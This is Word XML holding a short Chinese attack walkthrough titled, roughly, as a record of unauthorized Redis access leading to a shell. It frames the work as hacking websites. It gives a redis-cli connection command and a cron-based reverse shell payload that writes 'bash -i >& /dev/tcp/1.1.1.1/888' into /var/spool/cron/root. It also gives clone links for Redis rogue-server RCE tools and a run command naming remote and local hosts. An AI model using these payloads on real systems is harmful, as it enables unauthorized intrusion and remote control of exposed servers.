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FB" w:rsidRDefault="006E7DF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记一次</w:t>
      </w:r>
      <w:r w:rsidR="007F178F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未授权</w:t>
      </w:r>
      <w:r w:rsidR="00374169">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="007F178F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redis+</w:t>
      </w:r>
      <w:r w:rsidR="007F178F">
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00030B1D" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当我们日网站时候，常规漏洞如注入、xss等多尝试无果后，扫描端口也会发现意外收获</w:t>
      </w:r>
      <w:r w:rsidR="00B96B6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00030B1D" w:rsidRDefault="00B96B6A" w:rsidP="00030B1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫到了6379</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis，</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>默认情况下，会绑定在0.0.0.0:6379，如果没有采用</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>IP访问，就会将Redis服务暴露在公网上</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且在没有设置密码认证的情况下，会导致任意用户未授权访问</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>Redis以及读取Redis数据</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并写入公钥等远程连接</w:t>
      </w:r>
      <w:r w:rsidR="00030B1D">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084437E" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E84A84" wp14:editId="0D3B8E7E">
            <wp:extent cx="5274310" cy="14668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8F" w:rsidRDefault="0084437E">
      <w:r w:rsidRPr="0084437E">
        <w:t>当我们通过未授权访问或弱密码成功访问redis</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="0084437E">
        <w:t>，我们应该怎样进一步获取权限呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91B84" w:rsidRDefault="00B96B6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接redis：</w:t>
      </w:r>
      <w:r w:rsidR="00D91B84">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00D91B84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis</w:t>
      </w:r>
      <w:r w:rsidR="00D91B84">
        <w:t xml:space="preserve">-cli –h </w:t>
      </w:r>
      <w:r w:rsidR="00D91B84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084437E" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25131D42" wp14:editId="45E54B52">
            <wp:extent cx="4829175" cy="4019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37E" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前较主流的两个方法，第一种写入计划任务反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084437E" w:rsidRDefault="0084437E">
      <w:r w:rsidRPr="0084437E">
        <w:t>set x "\n* * * * * bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0084437E">
        <w:t>/888 0&gt;&amp;1\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="0084437E">
        <w:br/>
        <w:t>config set dir /var/spool/cron/</w:t>
      </w:r>
      <w:r w:rsidRPr="0084437E">
        <w:br/>
        <w:t>config set dbfilename root</w:t>
      </w:r>
      <w:r w:rsidRPr="0084437E">
        <w:br/>
        <w:t>save</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084437E" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个利用主从复制rce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084437E" w:rsidRDefault="0084437E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里利用第二个</w:t>
      </w:r>
      <w:r w:rsidR="00F8453C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRDefault="00F8453C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先下载脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRPr="00F8453C" w:rsidRDefault="00F8453C" w:rsidP="00F8453C">
      <w:r w:rsidRPr="00F8453C">
        <w:lastRenderedPageBreak/>
        <w:t>git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand（需要make）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRPr="00F8453C" w:rsidRDefault="00F8453C" w:rsidP="00F8453C">
      <w:r w:rsidRPr="00F8453C">
        <w:t>git clone https://github.com/Ridter/redis-rce.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRDefault="00F8453C"/>
    <w:p w:rsidR="00F8453C" w:rsidRDefault="00F8453C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00582C92" w:rsidRDefault="00582C92">
      <w:r w:rsidRPr="00582C92">
        <w:t>python3 redis-rogue-server.py --rhost=192.168.112.132 --lhost=192.168.112.133 --exp=exp.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRPr="00F8453C" w:rsidRDefault="00F8453C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45963812" wp14:editId="3629D504">
            <wp:extent cx="5274310" cy="16979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37E" w:rsidRPr="0084437E" w:rsidRDefault="0084437E"/>
    <w:p w:rsidR="0084437E" w:rsidRDefault="00582C92">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听之前反弹端口即可</w:t>
      </w:r>
      <w:r w:rsidR="00F8453C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8453C" w:rsidRPr="0084437E" w:rsidRDefault="00F8453C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75957EFF" wp14:editId="399BA33E">
            <wp:extent cx="4791075" cy="14287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53C" w:rsidRPr="0084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F0" w:rsidRDefault="00852EF0" w:rsidP="007F178F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00852EF0" w:rsidRDefault="00852EF0" w:rsidP="007F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F0" w:rsidRDefault="00852EF0" w:rsidP="007F178F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00852EF0" w:rsidRDefault="00852EF0" w:rsidP="007F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6F"/>
    <w:rsid w:val="00030B1D"/>
    <w:rsid w:val="00066938"/>
    <w:rsid w:val="001C3C6F"/>
    <w:rsid w:val="00374169"/>
    <w:rsid w:val="00582C92"/>
    <w:rsid w:val="006E7DF1"/>
    <w:rsid w:val="007F178F"/>
    <w:rsid w:val="0084437E"/>
    <w:rsid w:val="00852EF0"/>
    <w:rsid w:val="00B96B6A"/>
    <w:rsid w:val="00C976FB"/>
    <w:rsid w:val="00D91B84"/>
    <w:rsid w:val="00F35594"/>
    <w:rsid w:val="00F8453C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26CE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0DD43377-9241-4935-A052-C2B13FB2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李镇岐</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李镇岐</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-23T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-23T08:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>